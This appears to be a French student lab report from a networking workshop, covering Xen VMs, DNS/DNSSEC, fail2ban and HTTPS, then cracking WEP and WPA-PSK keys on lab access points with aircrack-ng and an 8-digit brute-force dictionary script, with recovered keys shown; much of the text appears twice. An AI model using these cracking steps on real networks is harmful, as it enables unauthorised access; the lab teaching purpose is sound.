port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans <code>fail2ban.conf</code> (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour '''lancer le service''' il faut rentrer la commande suivante :
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

== HTTPS ==
Dans le dossier <code>/etc/apache2/sites-available</code>

On met la clef '''deadpool.tech.key''' et les certificats '''GandiCert.pem''' et '''deadpool.tech.crt''' (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les commande suivantes :<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

== Sécurisation WiFi par WPA2-EAP ==

=== Partie VLAN ===

Depuis la machine batman on se '''ssh sur le routeur''' via cette commande :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

'''Création du Vlan24''' avec le nom PoolAntonin :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour configurer le '''vlan''' que nous venons de créer ainsi que le '''VRRP''' j'ai fait ceci : ('''/!\''' l'adresse IPv4 de votre vlan doit être mise dans le tableau commun sur le wiki afin d'éviter tout conflit avec une autre personne)<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

=== Partie WIFI ===

On peut exit enfin pour se ssh cette fois sur la partie '''wifi''' :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite les commandes suivantes, inspirées de celle du sujet, afin de configurer notre '''point d'accès wifi''' :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

Par le suite nous avons modifié plusieurs fichiers sans succès. Cette dernière partie est donc '''incomplète''' et ne permet pas de validé cette dernière.

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-23T10:33:41Z

Abiernac : /* Partie VLAN */

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires :<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

Pour '''restart''' le service<syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>On peut pour finir '''vérifier''' le bon fonctionnement de notre DNS via le site [https://dnsviz.net/ dnsviz]. Avec notre nom de domaine nous obtenons le graphe suivant :
[[Fichier:Deadpool.tech-2026-02-18-08 31 41-UTC.png|centré|vignette]]

== Fail2ban ==
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier <code>jail.local</code> dans le dossier <code>/etc/fail2ban</code>
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans <code>fail2ban.conf</code> (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour '''lancer le service''' il faut rentrer la commande suivante :
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

== HTTPS ==
Dans le dossier <code>/etc/apache2/sites-available</code>

On met la clef '''deadpool.tech.key''' et les certificats '''GandiCert.pem''' et '''deadpool.tech.crt''' (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les commande suivantes :<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

== Sécurisation WiFi par WPA2-EAP ==

=== Partie VLAN ===

Depuis la machine batman on se '''ssh sur le routeur''' via cette commande :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

'''Création du Vlan24''' avec le nom PoolAntonin :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour configurer le '''vlan''' que nous venons de créer ainsi que le '''VRRP''' j'ai fait ceci : ('''/!\''' l'adresse IPv4 de votre vlan doit être mise dans le tableau commun sur le wiki afin d'éviter tout conflit avec une autre personne)<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

=== Partie WIFI ===

On peut exit enfin pour se ssh cette fois sur la partie '''wifi''' :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
